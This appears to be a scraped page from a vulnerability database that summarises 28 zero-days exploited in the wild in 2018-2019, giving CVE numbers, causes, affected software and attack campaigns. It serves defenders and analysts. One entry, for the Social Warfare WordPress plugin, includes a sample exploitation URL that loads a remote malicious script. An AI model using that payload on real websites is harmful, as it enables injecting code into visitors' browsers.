Zero-day Vulnerability Database
Zero-day vulnerabilities discovered: 28
Privilege escalation in Microsoft Windows
CVE-2019-1458
Buffer overflow
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.
Note, this vulnerability is being actively exploited in the wild.
This vulnerability was reported by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. This vulnerability was used in Operation WizardOpium campaign against Korean users.
Software: Windows
This vulnerability was reported by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. This vulnerability was used in Operation WizardOpium campaign against Korean users.
Remote code execution in Draytek Vigor 2960, 3900 and 300B
CVE-2020-8515
Improper Neutralization of Special Elements in Output Used by a Downstream Component
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to the affected devices allow remote code execution as root (without authentication) via shell metacharacters to the "cgi-bin/mainfunction.cgi" URI.
Note, this vulnerability is being actively exploited in the wild starting from December 4, 2019.
The vulnerability in WebUI of DrayTek Vigor enterprise routers is being exploited in the wild at least from December 4, 2019. Two affected scripts are believed to be used by two different attack groups to eavesdrop on FTP and email traffic inside corporate networks.
Software: Vigor 2960
Links:
Remote code execution in Microsoft Internet Explorer
CVE-2019-1429
Buffer overflow
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a boundary error within the scripting engine. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Software: Microsoft Internet Explorer
Links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429
Remote code execution in Google Chrome
CVE-2019-13720
Use-after-free
The vulnerability allows a remote attacker to compromise vulnerable system.
The vulnerability exists due to a use-after-free error when processing HTML content within the audio component. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
Note, this vulnerability is being actively exploited in the wild.
Kaspersky Lab has identified in the wild exploitation of the vulnerability. This vulnerability was used in Operation WizardOpium campaign against Korean users.
Software: Google Chrome
Kaspersky Lab has identified in the wild exploitation of the vulnerability. This vulnerability was used in Operation WizardOpium campaign against Korean users.
Links:
Remote code execution in Microsoft Internet Explorer
CVE-2019-1367
Use-after-free
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a use-after-free error within the scripting engine in JScript.dll. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Note: this vulnerability is being actively exploited in the wild.
Software: Microsoft Internet Explorer
Privilege escalation in Microsoft Windows Winsock
CVE-2019-1215
Buffer overflow
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a boundary error within the ws2ifsl.sys (Winsock). A local user can run a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.
Note, this vulnerability is being actively exploited in the wild.
Software: Windows
Privilege escalation in Microsoft Windows CLFS
CVE-2019-1214
Buffer overflow
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a boundary error within the Windows Common Log File System (CLFS) driver. A local user can create a specially crafted application and execute arbitrary code on the system with elevated privileges.
Note, this vulnerability is being actively exploited in the wild.
Software: Windows
Privilege escalation in Microsoft Windows Win32k component
CVE-2019-1132
NULL pointer dereference
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a NULL pointer dereference error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.
Note, this vulnerability is being actively exploited in the wild.
sha1: CBC93A9DD769DEE98FFE1F43A4F5CADAF568E321
Software: Windows
Known/fameous malware:
Win32/Exploit.CVE-2019-1132.A
VBA/TrojanDropper.Agent.ABM
VBA/TrojanDropper.Agent.AGK
Win32/Spy.Buhtrap.W
Win32/Spy.Buhtrap.AK
Win32/RiskWare.Meterpreter.G
sha1: CBC93A9DD769DEE98FFE1F43A4F5CADAF568E321
Links:
Privilege escalation in Microsoft splwow64
CVE-2019-0880
Permissions, Privileges, and Access Controls
The vulnerability allows a local to escalate privileges on the system.
The vulnerability exists due to the way splwow64.exe handles certain calls. A local user can abuse this functionality to elevate privileges on an affected system from low-integrity to medium-integrity.
Note, this vulnerability is being actively exploited in the wild.
Software: Windows
Security restrictions bypass in Mozilla Firefox and Firefox ESR
CVE-2019-11708
Permissions, Privileges, and Access Controls
The vulnerability allows a remote attacker to bypass sandbox restrictions.
The vulnerability exists due to insufficient vetting of parameters passed with the Prompt:Open
IPC message between child and parent processes. A remote attacker can create a specially crafted web page that can make the non-sandboxed parent process open web content chosen by a compromised child process.
An attacker can combine this behavior along with another vulnerability to execute arbitrary code on the system with privileges on the current user.
Note, this vulnerability is being exploited in the wild along with SB2019061805 (CVE-2019-11707)
This vulnerability was used along with CVE-2019-11707 in a targeted attack against Conbase.
Software: Mozilla Firefox
This vulnerability was used along with CVE-2019-11707 in a targeted attack against Conbase.
Remote code execution in Oracle WebLogic Server
CVE-2019-2729
Deserialization of Untrusted Data
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to insecure input validation when processing serialized data within XMLDecoder class. A remote non-authenticated attacker can pass specially crafted data to the application and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Note: this vulnerability is being actively exploited in the wild.
Oracle has released a security alert, notifying users on in the wild exploitation of the vulnerability.
Software: Oracle WebLogic Server
Remote code execution in Mozilla Firefox and Firefox ESR
CVE-2019-11707
Type Confusion
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a type confusion error when manipulating JavaScript objects due to issues in Array.pop. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Note: this vulnerability is being actively exploited in the wild along with SB2019062002 (CVE-2019-11708).
The vulnerability was reported by Mozilla to be actively exploited in the wild.
This vulnerability as reportedly used in a targeted attack against Coinbase employees on Monday, June 17 2019.
The vulnerability was used in conjunction with another sandbox bypass issue CVE-2019-11708, patched by Mozilla on June 20, 2019.
This vulnerability was independently discovered and reported to Mozilla by a security researcher Samuel Groß on April 15. It took Mozilla 64 days to issue a security fix.
Software: Mozilla Firefox
The vulnerability was reported by Mozilla to be actively exploited in the wild.
This vulnerability as reportedly used in a targeted attack against Coinbase employees on Monday, June 17 2019.
The vulnerability was used in conjunction with another sandbox bypass issue CVE-2019-11708, patched by Mozilla on June 20, 2019.
This vulnerability was independently discovered and reported to Mozilla by a security researcher Samuel Groß on April 15. It took Mozilla 64 days to issue a security fix.
Links:
Privilege escalation in Windows Error Reporting
CVE-2019-0863
Input validation error
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to the way Windows Error Reporting (WER) handles files. A local user can create a specially crafted WER file and execute arbitrary code on the system in kernel mode.
Note: this vulnerability is being actively exploited in the wild.
Software: Windows
Remote code execution in WhatsApp
CVE-2019-3568
Buffer overflow
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to a boundary error within the WhatsApp VOIP stack when processing SRTCP packets. A remote attacker can send a series of specially crafted SRTCP packets sent to a target phone number, trigger buffer overflow and execute arbitrary code on the target device.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Note: this vulnerability is being actively exploited in the wild.
The vulnerability was used in a targeted attack against a limited number of people. First vulnerability exploitation was detected on May 12 2019. The attackers targeted a phone of a UK-based human rights lawyer to install spyware.
Software: WhatsApp Messenger for Android
Known/fameous malware:
Pegasus
Links:
Improper access control in Yuzo Related Posts WordPress plugin
Improper access control
The vulnerability allows a remote attacker to gain unauthorized access to the website.
The vulnerability exists due to improper access restrictions when processing HTTP requests. A remote attacker can pass specially crafted configuration to the affected application and inject arbitrary JavaScript code WordPress configuration.
Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable application.
Note: the vulnerability is being actively exploited i the wild.
Improper access control vulnerability in the plugin allowed attacker to inject malicious JavaScript code and redirect users to phishing websites.
Software: Related Posts
Privilege escalation in Win32k.sys driver in Microsoft Windows
CVE-2019-0859
Buffer overflow
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.
Note: this vulnerability is being actively exploited in the wild.
The vulnerability was reported to Microsoft by Vasily Berdnikov and Boris Larin from Kaspersky Lab.
Software: Windows
Privilege escalation in Win32k.sys driver in Microsoft Windows
CVE-2019-0803
Buffer overflow
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a boundary error when processing objects in memory within the Microsoft Graphics Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.
Note: this vulnerability is being actively exploited in the wild.
The vulnerability was reported to Microsoft by Donghai Zhu of Alibaba Cloud Intelligence Security Team.
Software: Windows
Backdoor in Asus Live Update
Hidden functionality (backdoor)
The vulnerability allows a remote attacker to compromise vulnerable system
The vulnerability exists due to hidden functionality (backdoor) is present in software. A remote attacker can use this functionality to gain full access to the application and compromise the affected system.
Note: this backdoor was implented as a result of ASUS servers compromise within the APT attack dubbed “Operation ShadowHammerâ€. The campaign ran from June to at least November 2018.
Software: ASUS Live Update
Stored XSS in Social Warfare WordPress plugin
CVE-2019-9978
Cross-site scripting
The vulnerability allows a remote attacker to perform cross-site scripting attacks.
The vulnerability exists due to usage of the eval() JavaScript call on data passed via the "swp_url" HTTP GET parameter to "/wp-admin/admin-post.php" script, when "swp_debug" is set to "load_options", allowing to permanently inject and execute arbitrary JavaScript code on the website. A remote unauthenticated attacker can store a specially crafted JavaScript code into database and execute it in browser of every website visitor.
Note: this vulnerability is being actively exploited in the wild.
Exploitation example:
http://[host]/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[malicious_js_script]/
A stored XSS vulnerability in the Social Warfare plugin, used by 70 000 users, led to a mass hacking campaign of WordPress websites.
Software: WordPress Social Sharing Plugin – Social Warfare
Links:
Insecure deserialization in Easy WP SMTP plugin for WordPress
Deserialization of Untrusted Data
The vulnerability allows a remote attacker to compromise vulnerable website.
The vulnerability exists due to insecure input validation when processing serialized data passed via the "swpsmtp_import_settings" HTTP POST parameter to /easy-wp-smtp.php script. A remote unauthenticated attacker can import arbitrary wp_options and reconfigure WordPress to allow user registration with administrative privileges.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable website.
Note: this vulnerability is being actively exploited in the wild.
WordPress websites were under attack due to vulnerability in a popular WP plugin since March 15, 2019.
Software: Easy WP SMTP
Privilege escalation in Microsoft Windows Win32k.sys driver
CVE-2019-0797
Memory corruption
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a boundary error within the Win32k.sys driver. A local user can execute a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Kaspersky Lab has detected and reported a zero-day vulnerability in Win32k.sys driver in Microsoft Windows.
Software: Windows
Privilege escalation in Microsoft Windows
CVE-2019-0808
NULL pointer dereference
The vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to a NULL pointer dereference error in the win32k!MNGetpItemFromIndex when NtUserMNDragOver() system call within the win32k.sys kernel driver. A local user can use a specially crafted application to escape sandbox and execute arbitrary code on the target system with SYSTEM privileges.
Note, this vulnerability is being actively exploited in the wild along with vulnerability in Google Chrome described in (SB2019030405).
On March 7th Google has reported in the wild exploitation of vulnerability in Microsoft Windows. During the attack the adversary used another zero-day vulnerability in Google Chrome in order to execute code on the system and vulnerability in Microsoft Windows to escalate privileges.
The initial attack was detected in late February.
Software: Windows
The initial attack was detected in late February.
Links:
Remote code execution in Google Chrome
CVE-2019-5786
Use-after-free
The vulnerability allows a remote attacker to compromise vulnerable system.
The vulnerability exists due to a use-after-free error in FileReader. A remote attacker can trick the victim into opening a specially crafted file with Google Chrome, trigger use-after-free error and execute arbitrary code on the target system.
Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.
Note: the vulnerability is being exploited in the wild.
The vulnerability in Google Chrome was used in a targeted attack along with another zero-day in Microsoft Windows.
The initial attack was detected in late February.
Software: Google Chrome
The vulnerability in Google Chrome was used in a targeted attack along with another zero-day in Microsoft Windows.
The initial attack was detected in late February.
Dangerous file upload in Adobe ColdFusion
CVE-2019-7816
Dangerous file upload
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to insufficient validation of user-supplied input when processing file uploads. A remote attacker can upload and execute arbitrary code on the target system with privileges of the ColdFusion service. Successful exploitation of the vulnerability requires that the attacker has the ability to upload files.
Note, this vulnerability is being actively exploited in the wild.
Software: ColdFusion
Information disclosure via PDF files in Google Chrome
Exposed dangerous method or function
The vulnerability allows a remote attacker to gain access to potentially sensitive information.
The vulnerability exists due to the PDF viewer allows sending information to a third-party domain via the "this.submitForm()" PDF Javascript API. A remote attacker can trick the victim into opening a specially crafted PDF file with Google Chrome and obtain sensitive information.
Note: the vulnerability is being actively exploited in the wild.
Vulnerability exploitation was spotted by EdgeSpot in late December 2018. The company detected multiple PDF samples in the wild that use dangerous JavaScript method to send information, retrieved from user's computer to a third-party domain.
Software: Google Chrome
Information Disclosure in Microsoft Internet Explorer
CVE-2019-0676
Out-of-bounds read
The vulnerability allows a remote attacker to gain access to potentially sensitive information.
The vulnerability exists due to boundary error when processing HTML content. A remote attacker can trick the victim to open a specially crafted webpage, trigger out-of-bounds read and test for the presence of files on disk.
Software: Microsoft Internet Explorer
Multiple vulnerabilities in Apple iOS
CVE-2019-7287
Privilege escalation
The vulnerability allows a local attacker to gain elevated privileges.The weakness exists due to a boundary error in the IOKit component when handling malicious input. A local attacker can run a specially crafted application, trigger memory corruption and execute arbitrary code with elevated privileges.
Successful exploitation of the vulnerability may result in system compromise.
Note: according to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.
According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.
Software: Apple iOS
Multiple vulnerabilities in Apple iOS
CVE-2019-7286
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges.The weakness exists due to a boundary error in the Foundation component when handling malicious input. A local attacker can run a specially crafted application, trigger memory corruption and gain elevated privileges.
Note: according to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.
According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.
Software: Apple iOS